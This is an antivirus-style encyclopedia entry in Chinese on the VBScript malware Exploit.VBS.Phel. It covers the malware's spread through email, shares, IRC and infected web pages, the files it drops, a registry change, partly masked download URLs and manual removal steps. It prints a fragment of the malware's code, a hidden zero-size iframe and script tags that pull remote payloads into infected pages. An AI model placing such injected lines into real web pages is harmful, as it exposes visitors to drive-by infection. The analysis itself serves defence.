基本介紹
病毒名稱和介紹,病毒描述,行為分析,清除方案,
病毒名稱和介紹
Exploit.VBS.Phel
檔案 MD5: 49B21DC7A8FDEE131119598E37E39DFA
公開範圍: 完全公開
開發工具: VB Script
加殼類型: 無
命名對照: Symentec[無]
Mcafee[Exploit-ObscuredHtml]
病毒描述
該病毒通過mail附屬檔案、區域網路共享、IRC聊天通道及感染htm、asp、jsp、php等網頁檔案傳播。該病毒對用戶有一定危害。
行為分析
1、病毒運行後,下載病毒檔案到系統臨時資料夾:
%Documents and Settings%\用戶名\Local Settings\Temp\nolove.gif
%Documents and Settings%\用戶名\Local Settings\Temp\a.asp
2、修改註冊表項:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
鍵值: 字串: "NotifyDownloadComplete "="yes"
3、聯接網路:
http://www.xuemu****.com/nolove.gif
http://www.sin***.com/shin/inc/a.asp
4、該病毒部分代碼為:
<iframe src="http://www.sin***.com/shin/inc/a.asp"width="0"height="0">
<SCRIPT language=JScriptsrc=\\http://www.xuemu****.com/nolove.gif\\"
."+String.fromCharCode(62)+\">
<SCRIPT language=VScript src="nolove.gif">
</SCRIPT><SCRIPTlang uage=VScript src="nolove.pif">
註:%Documents and Settings%是一個可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。Windows作業系統中默認的安裝路徑是C:\ Documents and Settings。
--------------------------------------------------------------------------------
清除方案
1、使用安天木馬防線可徹底清除此病毒(推薦)。
2、手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(2) 刪除病毒檔案
%Documents and Settings%\用戶名
\Local Settings\Temp\nolove.gif
%Documents and Settings%\用戶名
\Local Settings\Temp\a.asp
(3) 恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項
http://www.xuemu****.com/nolove.gif
http://www.sin***.com/shin/inc/a.asp
